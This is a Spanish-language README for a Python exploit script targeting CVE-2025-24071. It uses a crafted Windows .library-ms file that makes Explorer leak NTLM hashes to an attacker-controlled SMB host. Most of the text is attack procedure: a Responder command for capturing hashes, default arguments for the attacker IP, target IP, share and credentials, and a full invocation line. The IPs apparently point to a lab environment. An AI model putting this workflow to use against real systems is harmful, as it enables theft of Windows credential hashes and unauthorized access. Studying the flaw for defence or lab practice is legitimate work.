
Script en Python para ejecutar CVE-2025-24071
Este proyecto detecta y demuestra la explotación de una vulnerabilidad de suplantación del Explorador de Archivos de Windows.
El problema surge de un archivo de biblioteca de Windows (.library-ms) que contiene una ruta de red, ya sea como adjunto directo o incrustado en un archivo.
Al abrirlo, el archivo puede hacer que Windows filtre hashes NTLM a una ubicación de red remota (potencialmente maliciosa).
En tu máquina atacante, ejecuta Responder para capturar hashes NTLM:
sudo responder -I tun0 -wvF
Puedes configurar el script de dos maneras:
✅ Opción A: Editar valores predeterminados (más fácil)
Modifica los parámetros predeterminados directamente en el script.
parser.add_argument("--attacker-ip", default="10.10.14.14", help="IP del atacante") #tu IP
parser.add_argument("--target-ip", default="10.129.232.88", help="IP del objetivo") #IP del objetivo
parser.add_argument("--share-name", default="IT", help="Nombre del recurso compartido SMB") #nombre del recurso compartido al que tienes acceso sin la /
parser.add_argument("--username", default="USERNAME", help="Usuario SMB") #usuario del propietario del recurso compartido
parser.add_argument("--password", default="PASSWORD", help="Contraseña SMB") #contraseña del propietario del recurso compartido
parser.add_argument("--interface", default="tun0", help="Interfaz de red de Responder") #ver ifconfig, pero tun0 funcionará si estás en una VPN
return parser.parse_args()
✅ Opción B: Ejecutar con parámetros CLI
Ejecuta con argumentos:
python3 CVE-2025-24071.py \
--attacker-ip <IP_ATACANTE> \
--target-ip <IP_OBJETIVO> \
--share-name <NOMBRE_RECURSO> \
--username <USUARIO> \
--password <CONTRASEÑA> \
--interface <INTERFAZ>